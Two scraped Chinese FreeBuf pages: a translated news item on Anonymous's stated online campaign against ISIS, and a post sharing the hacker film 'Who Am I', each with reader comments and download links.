Anonymous(匿名者)最近在Youtube上发表了几个关于ISIS行动的视频,也讲述了他们组织在网络上打击ISIS的策略。

匿名者制定的策略是攻击在经济上支持ISIS的国家,其中包括土耳其(小编:土耳其黑客也很多啊,汗)和沙特阿拉伯。

“我们向这些国家发出警告,如果他们继续支持ISIS,我们将不得不摧毁他们的虚拟基础设施,而我们组织确实能做到这点。”

他还说,Anonymous组织试图在真理和逻辑上辩驳,来反击ISIS的意识形态。因为他们不能直接进行这些活动,所以大多数时候匿名者是通过媒体来操作的。

France24的记者报道,Anonymous成员称:“在此过程中,我们倾尽全力向公众警示,这些犯罪分子就是一群骗子,一群谎言制造者,他们不值得相信。”

相关视频(注:扒下Youtube视频时20多KB的网速,小编差点飙泪-_-!):

百度盘链接:http://pan.baidu.com/s/1gdf60G7
Youtube链接:http://www.youtube.com/watch?v=_kJtvFUMELM

Anonymous:ISIS是无异于3K党的杀人魔

“我们辩驳时,引用了伊斯兰教的交战守约,其中包括不伤战俘,不砍伐树木,不攻击政府部门。”我们还列举了伊斯兰教先知穆罕默德所立的约定,这曾被基督徒所认同。违反约定的应该驱逐出伊斯兰教。这条彻底逆转了他们在社会媒体之间的影响,暴漏了他们的本质–即‘劫持伊斯兰教的匪徒’。”

他补充说,ISIS与那些白人至上论主义者没啥两样。

“ISIS对他们自己的定义,与浸礼宗非常相似,都是些Anders Breivik(某极端主义杀人魔)一般的人。当然,他们与3K党也相差无几。”

不仅仅是匿名者掀起了对抗激进组织的虚拟战争,许多人以前也曾尝试过。现在全世界的穆斯林也在进行一场针对ISIS的推特大战。而推特已经关闭了许多属于ISIS异教徒的账户。

FreeBuf小编结语

以前听过某些人说Anonymous组织都是群极端主义的人,现在看来,也是满满的正能量有木有,明天就买个Anonymous面具戴去!

[参考信息来源hackread.com,译/FreeBuf小编dawner,转载请注明来自FreeBuf.COM]

这些评论亮了

  • He1en回复
    到处看到你们叫我名字,可从未见过本尊,呵呵!低调是最牛逼的炫耀,作为黑客你们必须懂!饱满充实的麦穗总是低着头的,倒是那些空壳会昂着首!
    )139(亮了
  • 老毒师回复
    @海伦 作为中国区Anonymous负责人,是不是对此事负责?
    )74(亮了
  • nilin(4级)回复
    话说最近有点感冒,声音可能不完美,请大家不要介意
    )9(亮了
发表评论

已有 52 条评论

  • 老毒师?2014-09-30回复1楼

    @海伦 作为中国区Anonymous负责人,是不是对此事负责?

    亮了(74)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-09-30回复

      @老毒师 今年海伦不知道来没来ISC。

      亮了(1)
      • Social?(3级)?2014-09-30回复

        没去

        亮了(1)
  • linvex?(3级)?2014-09-30回复2楼

    前排出售Anonymous周边,大家走过路过不要错过啊~
    [img]http://image.3001.net/images/20140930/14120520134222.jpg!small[/img]
    [img]http://image.3001.net/images/20140930/14120520142982.jpg!small[/img]

    亮了(1)
  • Social?(3级)?2014-09-30回复3楼

    最后的九块九…..

    亮了(3)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-09-30回复

      @Social? 还算便宜。。

      亮了(2)
  • gdd?2014-09-30回复4楼

    海伦是谁啊?

    亮了(1)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-09-30回复

      @gdd 传说中的中国Anonymous

      亮了(2)
  • sf?2014-09-30回复5楼

    海伦就是这个HELENE

    亮了(1)
    • sf?2014-09-30回复

      @sf 河蟹

      亮了(3)
      • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-09-30回复

        @sf 关键词被和谐了

        亮了(1)
  • He1en?2014-09-30回复6楼

    到处看到你们叫我名字,可从未见过本尊,呵呵!低调是最牛逼的炫耀,作为黑客你们必须懂!饱满充实的麦穗总是低着头的,倒是那些空壳会昂着首!

    亮了(139)
    • cherry lips?(1级)?2015-02-05回复

      呵呵,你是?

      亮了(3)
  • 3333yyyy?2014-09-30回复7楼

    我想说淘宝地址在哪,

    亮了(1)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-09-30回复

      @3333yyyy taobao一下,你就知道。。

      亮了(2)
  • jacker?(6级)Ubuntu Arch Vim爱好者?2014-10-01回复8楼

    怎么小编也看上Anonymous的面罩了

    亮了(1)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-10-01回复

      @jacker? :mrgreen: 看起来蛮高大上的 以后带着去参加蒙面舞会~~23333

      亮了(4)
  • biuhack?2014-10-02回复9楼

    怎么说,这次感觉是干人事了。

    亮了(1)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-10-04回复

      @biuhack 其实匿名者也不算邪路子吧~~

      亮了(1)
  • 河蟹?2014-10-02回复10楼

    你们这群渣渣别冒充本尊了 信不信本尊分分钟射你们

    亮了(5)
    • cherry lips?(1级)?2015-02-05回复

      HELEN ok?

      亮了(0)
  • adminn?(1级)?2014-10-03回复11楼

    国内缺的是信仰。

    亮了(3)
    • C?2014-10-03回复

      @adminn? 信仰能当饭吃吗,信仰几块钱一斤?

      亮了(2)
      • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-10-04回复

        @C 据说比卫生纸贵点,八块一斤~

        亮了(1)
      • yyyy3333?2014-10-08回复

        @dawner? 来5块钱的先尝尝

        亮了(2)
  • Mr_Pand?(1级)?2014-10-03回复12楼

    先用视频转换的网站转换,然后用百度云离线下载,就不用担心下载Youtube的视频慢了

    亮了(1)
    • dawner?(9级)黎明已经过去,黑暗就在眼前!?2014-10-04回复

      @Mr_Pand? 好主意!不过好像百度云经常维护,离线不太给力~

      亮了(1)
  • cck小兵?(1级)?2014-10-04回复13楼

    你们。。你们。。

    亮了(1)
  • 罗情怀?2014-10-08回复14楼

    太中二啦,耻度太大。

    亮了(2)
  • L34Rn?(2级)?2014-10-08回复15楼

    那是V的面具。。

    亮了(1)
  • test?2014-10-11回复16楼

    6月29日的新闻,9月30日才翻译过来。

    亮了(1)
    • 蓝翔校长?2014-10-11回复

      @test 你穿越了吧,6.29 isis还没抛头露面吧?

      亮了(1)
  • nilin?(4级)?2015-01-13回复17楼

    话说最近有点感冒,声音可能不完美,请大家不要介意

    亮了(9)
  • RDG相楽深行?(1级)?2015-02-07回复18楼

    @ He1en 成熟的麦子不低头,低头的是水稻,轮狗你被抓进去了就不要装逼了

    亮了(0)
  • IO?2015-02-10回复19楼

    这跟HELEN有毛关系 ,HELEN就是一骗子 哪里来的中国的anonymous

    亮了(0)
  • 『挽歌』?(1级)?2015-02-15回复20楼

    @ He1en 大神 求qq啊 大神

    亮了(0)
  • 留不住的人何必纠缠i?2015-02-16回复21楼

    当然有 但不多 但我这次开学时想带去 没手机太不方便

    亮了(0)
  • 三竖竖竖竖Yuki?2015-02-16回复22楼

    [doge][doge]好好读书 别学坏

    亮了(0)
  • 留不住的人何必纠缠i?2015-02-16回复23楼

    当然 我可一直都是好人

    亮了(0)
  • 三竖竖竖竖Yuki?2015-02-16回复24楼

    啧啧啧 这么夸自己真的好?

    亮了(0)
  • 留不住的人何必纠缠i?2015-02-17回复25楼

    看来不够低调 [纠结]

    亮了(0)
  • 三竖竖竖竖Yuki?2015-02-18回复26楼

    看出来了(°ー°〃)

    亮了(0)
  • 我与梦同醉?2015-02-21回复27楼

    你妈被林宥嘉劈腿了,生了你个瘪三

    亮了(0)
  • 噗噜噗噜酱?2015-02-21回复28楼

    脑子近狗屎了啊?

    亮了(0)
  • BlessingyouSweetheart-?2015-02-21回复29楼

    这个好

    亮了(0)
  • 胡彩铃万花筒?2015-02-22回复30楼

    每天都很困的07 亲在巴南区么?刚玩微博不久,能互粉下吗

    亮了(0)
  • yxs?2015-03-08回复31楼

    他们的网站是多少啊

    亮了(0)
  • 株朱猪要当学霸啦?2015-04-05回复32楼

    慢慢看啊

    亮了(0)
  • lycylttly?2015-04-05回复33楼

    嗯嗯

    亮了(0)
  • _limbotime?2015-09-09回复34楼

    The platforms attacked by the hackers are mnbr.info, a prominent ISIS forum used by the group’s supporters to communicate among themselves, and nshr.me, a cloud service. 2015.7

    亮了(1)
  • 醉生梦死??(1级)?2015-11-12回复35楼

    海伦???

    亮了(0)
  • 抛弃信用破产?2015-09-09回复36楼

    The platforms attacked by the hackers are mnbr.info, a prominent ISIS forum used by the group’s supporters to communicate among themselves, and nshr.me, a cloud service. 2015.7

    亮了(0)
表情插图

取消

dawner

dawner

黎明已经过去,黑暗就在眼前!

288 篇文章376 条评论

相关阅读

  • 为了互联网安全?俄罗斯黑客组织入侵CNET
  • 科研人员称可攻破 SecurID 令牌 RSA辟谣
  • HP修复StoreOnce的系统后门漏洞
  • 诺基亚台湾站点被黑,超过10万账户泄露
  • 圣经和古兰经APP中被发现监控木马

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

电影防火墙

电影防火墙

投稿

黑客电影《我是谁:没有绝对安全的系统》正片(含下载)

猴子2015-05-03+61801758人围观 ,发现 54 个不明物体其他视频

现实世界中的Loser,在网络世界却是一手遮天的顶级黑客。超级惊艳的德国电影,豆瓣目前评分8.1。一个三次元屌丝在网络上却是一名顶尖黑客,和一群人为了正义要入侵国际安全系统。在官方的追捕和命运攸关的考验之中,他开始怀疑选择……

影片梗概

本杰明是一个这样的人:三次元现实世界中,他是一个十足的屌丝&Loser,难以找到存在感,没有时尚感、没有朋友,也没有女朋友。但是二十五岁的他却是一个的电脑极客,拥有对数字技术不可思议的天赋。而影片中另一位主人公马克思是一个渴望“黑客世界”的潜在革命者,他注意到了本杰明在网络方面的惊人才华。

马克思,本杰明和神童斯蒂芬以及保罗私人组建了黑客组织CLAY,并且为了正义入侵国际安全系统。他们凭借高超黑客技术的所为引起了德国秘密警察组织、欧洲刑警组织的重视,并且一个邪恶的黑客将他们视作威胁,想要将他们除去。本杰明因此感觉到自己正在面临生死攸关的考验,并且他们的目标似乎不值得他付出如此大的代价……

预告片

预告片中的台词也很精彩:

“黑客技术就像魔术,处处充满了欺骗”“不要沉迷于网络技术,人才是突破信息系统的关键”

本预告片由FB视频组译制,转载请注明来自FreeBuf.COM

乐视地址(无广告)? ??优酷地址

正片观看及下载

在线观看

下载地址

下载链接 密码: 2wyx

*投稿:猴子,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

这些评论亮了

  • chinawifi(1级)回复
    说到漏洞最多的 就是人了. 不然社会工程学也不会那么吃香。 对的点我.
    )32(亮了
  • jacker(6级)Ubuntu Arch Vim爱好者回复
    这电影很不错的 ,其中MRX指定的三条规:第一条 没有一个系统是绝对安全的。第二条 敢做就能赢。第三条 在虚拟空间以及聚会空间享乐。 而我要加一条,我们不是电脑奴隶,我们拥有创造能力,也能毁灭它,我们网络中的一员。
    )21(亮了
  • 原作者ID回复
    #whoami
    #root
    )6(亮了
发表评论

已有 54 条评论

  • jacker?(6级)Ubuntu Arch Vim爱好者?2015-05-03回复1楼

    这电影很不错的 ,其中MRX指定的三条规:第一条 没有一个系统是绝对安全的。第二条 敢做就能赢。第三条 在虚拟空间以及聚会空间享乐。 而我要加一条,我们不是电脑奴隶,我们拥有创造能力,也能毁灭它,我们网络中的一员。

    亮了(21)
    • snakeyuna?(3级)?2015-05-04回复

      Who.Am.I.2014.Bluray.1080p.DTS.x264 带中文字幕,一共两个文件请同时下载。
      蓝光原盘目录个头太大,上传很是费事。
      http://kuai.xunlei.com/d/ij1RAQIxIAAZZkdV4d3
      同时在使出吃奶的力气上传Blackhat.2015.BluRay.1080p.AVC.DTS-HD.MA5.1.iso,也是蓝光原盘目录,自带中文字幕

      亮了(5)
      • snakeyuna?(3级)?2015-05-04回复

        @ snakeyuna? 更新地址:http://kuai.xunlei.com/d/ij1RAQKMIABpbEdVec8

        亮了(2)
      • Cortez?(1级)?2015-05-07回复

        @ snakeyuna? 截止至五月七日 1:47分,Blackhat 仍在上传。。。辛苦了。。

        亮了(2)
  • chinawifi?(1级)?2015-05-03回复2楼

    说到漏洞最多的 就是人了. 不然社会工程学也不会那么吃香。 对的点我.

    亮了(32)
  • HELEN?2015-05-03回复3楼

    社社社社社。。。。。。。。。。。。

    亮了(5)
  • cai_cai?(1级)?2015-05-03回复4楼

    怎么取消弹窗啊

    亮了(2)
  • softbug?(7级)011101000110100001100001011011…?2015-05-03回复5楼

    怎么取消弹窗啊 ri

    亮了(2)
  • Jcok?(1级)?2015-05-03回复6楼

    这么坑,,,,,

    亮了(2)
  • snakeyuna?(3级)?2015-05-03回复7楼

    俺这有蓝光原盘目录的下载,有人要不?23.99G

    亮了(4)
    • susftp?(5级)?2015-05-03回复

      @ snakeyuna?等下完你的 还不如去下看门狗来玩(*^__^*) 呵呵

      亮了(3)
      • snakeyuna?(3级)?2015-05-04回复

        @ susftp? 下载早已完成,就是上传太慢,3.32M/s的速度要好久,所以先在网盘里放了个小的。

        亮了(2)
      • snakeyuna?(3级)?2015-05-04回复

        @ susftp? 更新地址:http://kuai.xunlei.com/d/ij1RAQKMIABpbEdVec8

        亮了(2)
    • 赵子龙?(1级)?2015-05-03回复

      @ snakeyuna? 要得!

      亮了(1)
      • snakeyuna?(3级)?2015-05-04回复

        @ 赵子龙? 稍等,稍后放出下载地址

        亮了(1)
      • snakeyuna?(3级)?2015-05-04回复

        @ 赵子龙? 更新地址:http://kuai.xunlei.com/d/ij1RAQKMIABpbEdVec8

        亮了(0)
    • 森林中的野狼?(1级)?2015-05-03回复

      @ snakeyuna? 网盘

      亮了(2)
      • snakeyuna?(3级)?2015-05-04回复

        @ 森林中的野狼? 稍等,稍后放出下载地址

        亮了(1)
      • snakeyuna?(3级)?2015-05-04回复

        @ 森林中的野狼? 更新地址:http://kuai.xunlei.com/d/ij1RAQKMIABpbEdVec8

        亮了(1)
  • wahaha?(1级)?2015-05-03回复8楼

    比王力宏拍得那个好多了!

    亮了(3)
  • ovov?(2级)?2015-05-03回复9楼

    ftp://1:1@p13.poxiao.com:8202/[www.poxiao.com破晓电影]我是谁:没有绝对安全的系统BD德语中字.rmvb

    亮了(3)
  • 原作者ID?2015-05-03回复10楼

    #whoami
    #root

    亮了(6)
  • rpbswt?(1级)?2015-05-03回复11楼

    _.._ ,————.
    ,’ `. ( We want you! )
    / __) __` \ `-,———-’
    ( (`-`(-’) ) _.-’
    /) \ = / (
    /’ |–’ . \
    ( ,—| `-.)__`
    )( `-.,–’ _`-.
    ‘/,’ ( Uu”,
    (_ , `/,-’ )
    `.__, : `-’/ /`–’
    | `–’ |
    ` `-._ /
    \ (
    /\ . \. freebuf
    / |` \ ,-\
    / \| .) / \
    ( ,’|\ ,’ :
    | \,`.`–”/ }
    `,’ \ |,’ /
    / “-._ `-/ |
    “-. “-.,’| ;
    / _/[“—‘””]
    : / |”- ‘
    ‘ | /
    ` |

    亮了(2)
  • journey-zc?(1级)?2015-05-04回复12楼

    :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll: :roll:

    亮了(0)
  • 猴子?2015-05-04回复13楼

    叼不叼,哥们,没错,我就是雷锋

    亮了(1)
  • 猴子?(1级)关注互联网安全信息,关注博客.WwW.HackHz.cN?2015-05-04回复14楼

    我是雷锋,第一时间马上分享

    亮了(1)
  • fall in love?(1级)?2015-05-04回复15楼

    这个有中文字幕吗?问问大家

    亮了(1)
    • snakeyuna?(3级)?2015-05-04回复

      @ fall in love? 有

      亮了(1)
    • snakeyuna?(3级)?2015-05-04回复

      @ fall in love? http://kuai.xunlei.com/d/ij1RAQKMIABpbEdVec8 我是谁:没有绝对安全的系统

      亮了(1)
  • g67261831?(1级)?2015-05-04回复16楼

    王力宏拍的那个是个什么鬼,看的我睡着了。

    亮了(3)
  • freebuffzck?(4级)?2015-05-04回复17楼

    http://pan.baidu.com/s/1hqCeE36

    亮了(1)
  • 1.86G差评?2015-05-04回复18楼

    说好的1080p呢
    IMDB 7.5分

    亮了(1)
  • lee?2015-05-04回复19楼

    各种666666

    亮了(1)
  • 夜未央?(4级)?2015-05-04回复20楼

    为嘛没有1080P的?

    亮了(1)
  • 幽狼鬼影?(2级)某技术团队负责人 无线安全研究员 The world i…?2015-05-04回复21楼

    骇客交锋这部电影有正片吗

    亮了(2)
    • snakeyuna?(3级)?2015-05-04回复

      @ 幽狼鬼影? 有,正在网盘上传中

      亮了(1)
    • g67261831?(1级)?2015-05-05回复

      @ 幽狼鬼影? 不用看了,垃圾的不行。

      亮了(1)
  • Angus?(5级)AMD?Zen.Team.com.org.cn.net/lo…?2015-05-04回复22楼

    已看完..!
    http://www.lanyingwang.com/who-am-i-2014-720p-1080p-bluray-dts-x264-hds.html 1080P下载地址! 如果上不了这网在host文件那添加43.242.128.133 www.lanyingwang.com

    亮了(1)
    • M?2015-05-04回复

      @ Angus? 马克,正愁去哪里下高清片丢硬盘里呢

      亮了(1)
  • 我是煞笔?2015-05-04回复23楼

    我才不会告诉你们,片尾演职员表打出来的时候,背景是一个 Windows 下最简单的全局键盘记录器(基于消息钩子)的源代码呢

    亮了(5)
  • 789?2015-05-04回复24楼

    大概只是电影吧,这些官都有污点,比如在校期间打胎,然后想法设法掩饰,要是我,绝不做出格的事,做了,被发现,我就敢认。

    亮了(2)
  • windmonk?(1级)?2015-05-06回复25楼

    男主角 把整个街区电力切断的时候难道就不断网吗,还是说仅仅把灯关了。。。居然接着又恢复了。。。难道每家子都有UPS不成。。。

    亮了(1)
    • wxx?(1级)?2015-05-08回复

      @ windmonk? ? 在中国都有4G 有 随身WiFi (插4G卡) 你觉得呢?

      亮了(1)
      • windmonk?(1级)?2015-05-08回复

        @ wxx? 也是有手机信号就行 而且信号塔应该有备用电力

        亮了(1)
  • mudongliangabcd?(2级)信息安全方向研究生,Debian使用者及拥护者!?2015-05-07回复26楼

    这个电影真的很不错!

    亮了(1)
  • 康小泡_?(1级)?2015-05-08回复27楼

    为嘛最近你特别火

    亮了(0)
  • filefox?(3级)?2015-05-11回复28楼

    首位呼应很棒,变戏法,白糖四变一,最后,给调查官四个白糖,就是告诉他,哥其实是四个!。

    亮了(4)
    • RnzxTpyeoSwh7?2015-05-16回复

      @ filefox? 其实我都没想到,你一说还真是。电影白看了!

      亮了(0)
  • Sec_钊?(1级)?2015-05-14回复29楼

    看完了,敢脚不错。

    亮了(0)
  • 钢板?2015-06-11回复30楼

    已看完 和哈迪斯一样精彩!

    亮了(0)
  • ' 钢板?(1级)?2015-06-11回复31楼

    看完了,敢觉不错 和哈迪斯一样精彩。 :cry:

    亮了(0)
  • breeze?(2级)?2015-06-19回复32楼

    已看完,非常好的电影,推荐所有FREEbuf 人看

    亮了(0)
  • 青落消散在水中?(1级)?2016-01-25回复33楼

    我觉得这电影很像《黑客军团》,主人公也是有精神疾病,他的父亲也是黑客,但最后都证明了他父亲都是他幻想出来的,推荐大家去看看那部剧!

    亮了(0)
  • 死宅10086?(6级)?2016-06-26回复34楼

    路過瞧瞧 :lol: :lol:

    亮了(0)
表情插图

取消

猴子

猴子

关注互联网安全信息,关注博客.WwW.HackHz.cN

1 篇文章1 条评论

相关阅读

  • 【企业研究报告】FreeBuf Insight:网络安全创新企业Top 10解读之FireEye
  • 【原创连载小说】《杀手》第一章:网络杀手
  • 我来了,你在哪?FREE TALK?深圳站 议题征集
  • FreeBuf全球安全事件纵览(2015年第一季度):一年之计在于春
  • 传统安全企业发展趋势的一些看法

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank